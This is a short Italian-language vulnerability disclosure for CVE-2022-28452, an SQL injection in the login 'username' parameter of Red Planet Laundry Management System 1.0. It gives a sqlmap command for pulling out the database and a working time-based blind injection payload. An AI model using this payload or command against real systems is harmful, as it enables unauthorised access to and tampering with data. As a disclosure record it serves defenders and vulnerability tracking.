
CVE-2022-28452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28452 https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-28452 https://laundry.redplanetcomputers.com/
1-Descrizione:
Red Planet Laundry Management System 1.0 è vulnerabile a SQL Injection tramite il parametro 'username' in /index.php/login/rediract. Lo sfruttamento di questo problema potrebbe consentire a un aggressore di compromettere l'applicazione, accedere o modificare i dati, oppure sfruttare vulnerabilità latenti nel database sottostante.
2-Prova di concetto:
In Burpsuite intercetta la richiesta dalla pagina interessata con il parametro 'username' e salvala come poc.txt. Quindi esegui SQLmap per estrarre i dati dal database: sqlmap.py -r poc.txt --dbms=mysql
3-Esempio di payload:
L'input POST con codifica URL del parametro username è stato impostato su 0'XOR(if(now()=sysdate(),sleep(4),0))XOR'Z
Dettagli di contatto: [email protected]